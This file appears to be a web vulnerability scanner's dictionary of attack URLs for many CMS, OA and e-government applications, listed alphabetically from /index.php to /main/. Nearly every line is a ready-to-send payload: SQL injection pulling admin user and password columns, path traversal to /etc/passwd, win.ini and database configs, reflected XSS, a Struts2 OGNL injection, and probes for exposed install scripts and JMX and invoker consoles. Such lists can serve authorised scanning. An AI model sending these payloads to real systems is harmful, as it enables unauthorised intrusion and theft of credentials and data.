/index.php?m=company&s=admin/exportexcel&ordrby=user%20and%201=websec%23
/index.php?m=company&s=space_comments&uid=1%20and%20extractvalue(1,%20concat(0x5c,%20(select%20md5(1122)%20from%20information_schema.tables%20limit%201)));%20--
/index.php?m=company&s=space_comments&uid=1and%20(SELECT%201%20from%20(selectcount(*),concat(floor(rand(0)*2),(substring((select(selEctconcat(user,0x7c,password)%20from%20b2bbuilder_admin%20limit%200,1)),1,62)))a%20frominformation_schema.tables%20group%20by%20a)b)
/index.php?m=company&s=space_mail&tid=1)%20and%201=websec%20%23
/index.php?m=member&c=index&a=public_checkname_ajax&username=admin%25%252727%20and%201=1%23
/index.php?m=message&s=inquire&userid=1)%20UnIon%20select%201,12,123%20from%20webscan%23
/index.php?m=message&s=inquiry_basket
/index.php?m=news&s=admin/news&newsid=1%20and%20(SELECT%201%20from%20websec)
/index.php?m=news&s=admin/newslist&submit=%E5%88%A0%E9%99%A4&did=999%29%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%28selEct%20concat%28user,0x7c,password%29%20from%20f10bd198561acb0197452013b7a82429%20limit%200,1%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
/index.php?m=poster&c=index&a=poster_click&id=1
/index.php?m=search&a=public_get_suggest_keyword&url=http://www.baidu.com/&q=/../robots.txt
/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=1122&description=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
/index.php?m=wap&siteid=1&a=big_image&url=aHR0cDovL3hzc3Rlc3QuY29tIiBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDQyODczKTs=
/index.php?m=yp&c=index&a=lists&areaid=12&catid=114&price=&tid=1%22%20onmouseover=prompt(42873)%20&page=1&order=1
/index.php?m=yp&c=index&a=lists&areaid=37%20%20onmouseover%3Dprompt%2842873%29%20&catid=10&price=1_500&page=1&order=4
/index.php?m=yp&c=index&a=lists&areaid=37&catid=10&price=%22%20onmouseover=prompt(42873)%20&page=1&order=4
/index.php?mod=../admin/admin&a=list
/index.php?mod=../admin/admin&ac=list
/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
/index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?product-%22%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20-1122-viewpic.html
/index.php?q=1%25%2527%2520and%25201%253D2%2520%2523&do=search&action=lists&module=product
/index.php?s=/down/down/&file=./index.php
/index/searchInfoTcontentByCategory.action?infoSearchPid=8&infoSearchkey=1%25'%20AND%201=CHAR(106)%2bCHAR(106)%2bCHAR(106)%20AND%20'%25'='
/indexGetDatags.do?depNO=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/index_archives.php?search_keyword=%df'/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,0x6366726565723A693A7765627363616E,0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
/index_page/geren_list_page.aspx?server=1&refid=1'%20AND%201=CHAR(106)%2bCHAR(60)%20--
/indexsearch/filter.jsp?tableId=1%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/indivgroup_dispbbs.php?groupid=1&id=2&page=1&groupboardid=-1%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a);%20--
/info.php
/info.php?fid=1&tblprefix=cms_msession%20and%201=reer%20--
/infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1'%20AND%209935=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)%7C%7CCHR(112)%7C%7CCHR(102)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(9935=9935)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(117)%7C%7CCHR(115)%7C%7CCHR(115)%7C%7CCHR(113))%20AND%20'keyi'='keyi&filters=
/info_send_sign/sign.jsp?TID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT(0x7161756c71,0x4876764d4b4b43744171,0x7166666571),NULL,NULL%23
/infolist.aspx?ClassId=5)%20and%201122=CONVERT(INT,(SELECT%20CHAR(84)%2bCHAR(97)%2bCHAR(105)%2bCHAR(87)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(103)%2bCHAR(111)%2bCHAR(58)%2bCHAR(104)%2bCHAR(111)%2bCHAR(109)%2bCHAR(101)))%20AND%20(1=1
/information/OA_Condition.asp?class=1&subclass=(CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))))---
/information/OA_PingLun.asp?PLType=1&POAID=54'%20and+1=char(106)%20--
/information/oa_infordislist.asp?class=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
/install.log
/install.php
/install/
/install/index.php
/install/index.php.bak?insLockfile=1
/install/index.php?_m=frontpage&_a=check
/install/index.php?insLockfile=1
/install/index.php?step=1&insLockfile=1
/install/install.php.lock?step=2
/install/install.php?action=setup&dbhost=0.0.0.0&port=3306&dbname=webscan&dbuser=rerejj&dbpassword=nEwPa$$Wr0d&tableprefix=shop_&guid=1
/install/step4.aspx
/install/svinfo.php
/installation/install.php
/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/interface/ugo.php?OA_USER=aa%2527%20and%201=(select%201%20from(select%20count(*),concat(0x7c,0x484B3A693A31393937,0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271
/intoSpDept.do?bmid=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/invest/full_success/a20141200142%20or%20updatexml(1,concat(0x7e,(md5(0x4124))),0)%20--%20-.html
/invoker/EJBInvokerServlet/
/invoker/JMXInvokerServlet/
/ippool.php/login.php/login.php/login.php/login.php/login.php/login.php/login.php?name=-1%27%20UNION%20SELECT%201,2,3,4,md5(0x045154),6,7%23
/ippool_edit.php/login.php/login.php/login.php/login.php/login.php?ID=-1%27%20UNION%20SELECT%201,2,3,md5(0x045154),5,6,7%23
/ismservice/jsp/billQueryPage.jsp?entercode=3%22%3C/script%3E%3Cscript%3Eprompt(42873);%3C/script%3E//
/ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/logincheck.php?USEING_KEY=2&USERNAME=abc%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/item.php?act=search&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,char(99,102,114,101,101,114),0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23&searchsort=subject&catid=0&ordersort=addtime&ordertype=asc&searchsubmit=yes
/item/?c-5,key-1'.html
/jact/workflow/design/index.jsp?flowcode=a'%20UNION%20ALL%20SELECT%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(107)%7C%7CCHR(109)%7C%7CCHR(108),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
/jcms/interface/ldap/ldapconf.xml
/jcms/interface/user/out_userinfo.jsp?xmlinfo=%3Cmain%3E%3Cstatus%3EQ%3C/status%3E%3C/main%3E
/jcms/jcms_files/jcms1/web1/site/module/messagebook/opr_readfile.jsp?filename=opr_readfile.jsp
/jcms/jcms_files/jcms1/web2/site/module/comment/opr_readfile.jsp?filename=opr_readfile.jsp
/jcms/m_1_9/column/getgroupuser.jsp?jgid=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)%20--&spell=2&webid=3&userid=4
/jcms/m_5_1/attach_dwn.jsp?filename=passwd&fpath=/etc/passwd
/jcms/m_5_5/m_5_5_1/objectbox/selectx_search.jsp?spell=1%25%27%20union%20all%20select%20null%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%20from%20dual%20--
/jcms/m_5_6/ajax_printcol.jsp?cataid=1)%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)%20--
/jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
/jcms/m_5_e/init/sitesearch/opr_classajax.jsp?classid=1%20union%20all%20select%2012,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20from%20dual%20--
/jcms/oawindow/helpshow.jsp?message=%3Cscript%3Ealert(String.fromCharCode(52,%2050,%2056,%2055,%2051));%3C/script%3E
/jcms/setup/publishadmin.jsp
/jcms/workflow/design/opr_model_class.jsp?fn_billstatus=E&vc_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100),NULL,NULL,NULL%20--
/jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig
/jcms/workflow/sys/que_dictionary.jsp?que_keywords=1'%20and%20'1'='1%20
/jdwz/newsAction.do?flag=flag&NewsId=-12'%20union%20all%20select%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29,12,12,12,12,12,12,12,12--
/jdwz/qtpage/findAllPoint.jsp?dtcxlb=vcsfjg&point_name=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2CNULL--%20&vcsfjg=all
/jiaowu/jwgl/jxjh/jxjha.asp
/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp.
/jis/front/sdgs/updateuser.jsp
/jis/interface/offer.jsp?flag=user
/jis/manage/databak/showlog.jsp?path=../showlog.jsp
/jis/manage/role/opr_approleinfo_user2.jsp?c_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(101)%2bCHAR(102)%2bCHAR(58)%2bCHAR(104)%2bCHAR(103)%2bCHAR(58)%2bCHAR(105),NULL,NULL--%20
/jiuyeIndex.do?method=showPic&zzp=../../../../../../../../../../etc/passwd
/jmx-console/
/job/job.php?lang=cn&id=2&settings[met_column]=met_admin_table%20where%201=2--%201
/job/msearch-trunk/lastSuccessfulBuild/artifact/?pattern=C:/Windows/system.ini
/journal_guide?inital=T&marc_type=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)&subtag=&tag=
/jphoto/objectbox/selectx_search.jsp?spell=1%25%27%20UNION%20SELECT%20CHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2899%29%7C%7CCHR%2899%29%2Cnull%20FROM%20DUAL%20--
/js.php?jssort=shop&sort=1&num=2&panels=a'+and/**/1=2/**/union%20select+1,sha1('360webscan'),3,4,5%23
/js.php?sort=1&jssort=shop&where=%201=2%20/**/union/**/select/**/1,adminname,password,4,5/**/from/**/modoer_admin%23
/js/calendar.php?lang=../js
/js/mood/xinqing.aspx?action=mood&classid=download&id=12'/**/and/**/1=char(106)--&typee=mood3&m=2
/jsearch/admin/opr_forcechangepwd.jsp
/jsearch/main/index/down.jsp?pathfile=./&filename=WEB-INF/ini/merpserver.ini
/jsearch/viewsnap.jsp?snapname=/../../../../../../../../../../../../../etc/passwd
/jserr.php?jsstr=%3Cimg%20src=@%20onerror=alert(42873)%20/%3E
/jsp-examples/
/jsp/user/loginAction.do
/jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd
/jsp/util/file_download.jsp?filePath=c:%5Cwindows%5Cwin.ini%00.xml
/jwgl/jxjh/jxjha.asp
/jy/jiuyeIndex.do?method=showPic&zzp=../../../../../../../../../../etc/passwd
/kbase_list.aspx?kcatid=1%20UNION%20SELECT%201,2,char(106)%2bchar(106),4,5,6,7,8%20from%20syscolumns--
/kc_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL#
/kdgs/biz/portal/govservice/deptServiceList.action?catalogName='%2b+convert(int,(char(106)%2bchar(58)))+%2b'&dc=12&__type=undefined
/kecheng.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL#%20
/kecheng_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/kq/options/kq_duration_tree.jsp?params=union%09select%09table_name%09from%09information_schema.tables
/lates/index.html?username=123%27%2f%2a%2a%2fand%2f%2a%2a%2f%28seleselectct%2f%2a%2a%2f1%2f%2a%2a%2ffrom%2f%2a%2a%2f%28selselectect%2f%2a%2a%2fcount%28%2a%29%2Cconcat%280x7c%2C0x7765627363616E3A693A66696E64%2C0x7c%2Cfloor%28rand%280%29%2a2%29%29x%2f%2a%2a%2ffrom%2f%2a%2a%2finformation_schema.tables%2f%2a%2a%2fgroup%2f%2a%2a%2fby%2f%2a%2a%2fx%29a%29%23
/ldhyhd.do?theAction=edit_bzOne&id=1'%20UNION%20ALL%20SELECT%20NULL,CHR(113)%7C%7CCHR(120)%7C%7CCHR(105)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(115)%7C%7CCHR(78)%7C%7CCHR(65)%7C%7CCHR(108)%7C%7CCHR(70)%7C%7CCHR(71)%7C%7CCHR(103)%7C%7CCHR(98)%7C%7CCHR(120)%7C%7CCHR(75)%7C%7CCHR(113)%7C%7CCHR(114)%7C%7CCHR(109)%7C%7CCHR(108)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/letter/letter_detail.aspx?id=8'%20%20and+1=char(106)%2bchar(106)%20--
/level/15/exec/-/show/running-config/CR
/level3.jsp?tablename=7&infoid=-1'%20UNION%20ALL%20SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29--
/link.php?act=go&url=webscan.cn'
/linklist.asp?TlinkID=26'/**/and/**/1=char(106)--
/list.php?Fid=1-_pre-qb_fenlei_sort%20A%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/listdevchannal.php?iChan=1&devid=-1%20UNION%20SELECT%201%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C3%2C4%2C5%2C6%2C7%2C8
/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1122'%20and%201=char(106)%20--
/lkoa6/dzyj/LoadNextNode.ashx?id=1%27%20and%20@@version%3E0--&value=1&selectedUserIds=1&nodeModel=SYS
/lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL--
/lm/front/findpsw.jsp?editpagename=&groupid=&sysid=../../../../../../../../../../etc/passwd%00.jpg
/lm/front/mailhotlist.jsp?editpagename=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&sysid=001
/lm/front/mailpublist.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
/lm/front/noontimelist.jsp?flag=a&start=1&end=2&sysid=2'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL%20FROM%20DUAL%20--&groupid=4
/lm/front/reg.jsp?sysid=../reg.jsp%00.jpg
/lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23
/lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,0x7765627363616E3A693A66696E64,0x7e)%23
/lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL%20--
/lm/manage/opr_setappraisal.jsp?fn_billstatus=E&vc_setapprid=-2087%20UNION%20ALL%20SELECT%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL%20FROM%20DUAL--
/lm/objectbox/selectx_groupuserlist.jsp?vc_parid=-42873%27+or+%271%27=%271
/lm/sys/opr_bulletin_show.jsp?vc_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
/lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,md5(1122),0x7e),NULL,NULL,NULL,NULL
/lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL%23
/log.nsf
/log/
/logfiles/
/login.action
/login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/login.asp
/login.aspx
/login.aspx?test=TestSystem&password=1122&oid=2%20and%202=(convert(int,char(106)))&uid=1
/login.htm
/login.html
/login.jsp
/login.php
/login.php?LOGIN_USER_INCLUDE=/etc/passwd
/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpg
/login.php?SSL_CLIENT_S_DN_Email=%27+or+1=%28select+1+from+%28select+count%28*%29,concat%28%28SELECT+md5%281122%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%23/wapc/5000_0005_003
/login/Log.aspx?loginname=/**/'/**/and/**/char(106)%3E0/**/--
/login/TransactList.aspx?ItemName='/**/and/**/1=char(106)/**/--
/login/proexamineview.aspx?ActivityInstanceId='/**/and/**/user/**/%3E0/**/--
/login/publicpage.aspx?infotype=InfoZWGK_zwgk'/**/and/**/char(106)%3E0/**/--&dic_name=
/logincheck.php?UNAME=cfreer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/logincheck.php?UNAME=reer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/logincheck.php?USEING_KEY=2&USERNAME=cfreer%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/logo_curconf.php?deptname=-1'%20and%201=2%20UNION%20SELECT%201,concat(0x7c,md5(1122),0x7c),3,4,5,6,7,8,9,10,11,12%23
/logs/
/m/info/top_rating.action?clsNo=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'at'='at
/m/mazmun.php?hid=-7929%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b707a71,0x4c55737a754262714a637768596b4d724642726e685749514c6c4b66795862426a6f636c616d644c,0x7170766b71)--%20-
/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
/magmi/web/magmi_import_run.php?%3C/script%3E%3Cscript%3Ealert%28%27webscan%27%29;%3C/script%3E
/mail/index.asp
/mail/index.aspx
/mail/index.jsp
/mail/index.php
/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise
/main.do
/main/
/main/findgbm2.asp?sql=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name&sqlbak=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name%20&px=
/main/model/childcatalog/fileFind.do?fcode=00103&title=-111%25%27%20union%20all%20select%20null%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--&Submit=%CB%D1%CB%F7
/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,0x6366726565723A696A78,3%20from%20H_System_User--
